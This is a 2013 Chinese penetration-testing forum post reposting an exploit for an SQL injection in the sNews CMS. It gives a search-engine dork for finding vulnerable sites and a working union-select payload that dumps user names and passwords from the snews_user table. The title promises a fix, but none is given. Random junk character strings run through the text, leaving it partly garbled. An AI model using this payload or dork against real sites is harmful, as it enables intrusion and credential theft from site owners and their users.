中国网络渗透测试联盟

标题: CMS snews SQL注射及修复 [打印本页]

作者: admin    时间: 2013-1-23 08:55
标题: CMS snews SQL注射及修复
标题: CMS snews SQL Injection Vulnerability/ F% p( m& }- L
作者: By onestree: {+ r5 h: ~& j( ?+ @
下载地址 : http://snewscms.com/7 K* V3 H; H. d
测试平台 : ubuntu 12.10 / win 7; b7 v8 ]4 {- g6 H
关键词: inurl:"tanyakan pada rumput yang bergoyang"3 B4 v/ X( u. W4 Q& g  O

* \# C7 d8 [2 |( B6 | ! X9 ^7 d# z3 ^. Y* F" Q7 u
*************************************************************/ k, M4 E4 W) j0 k4 \
( @+ S% a: F/ v* H! {
SQL poc:
7 a. F0 n% \4 [  Y+ U1 B1 f5 g6 }  L ; Q" X5 ]2 ^% y. E
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]8 `0 o% Y  s4 P. }; K

9 G' B4 K5 `0 V示例
2 |7 T7 t7 j: u5 k( J
, Y+ V' Z& p: L2 q2 A# xhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*- b' q, x9 p7 @$ @# A6 T/ f
: A6 Y. e7 s( f. `$ `1 u
4 H- s) q; Q/ @2 V/ A
致谢:
% T$ i; q/ I( a7 a, F
3 G8 r8 V# ?& x3 i8 V  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell8 y& j0 b) p9 Z5 h
     , y+ ]' T; J* l- j
          indonesiancoder - moeslimh4x0r - go-coder- F* H! H) ^0 s1 E

7 \6 j& f7 ~, j0 L7 U( U  Dspesial my hunny :*: W' O1 o' t1 Q0 T8 `( B: ]& }3 E





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2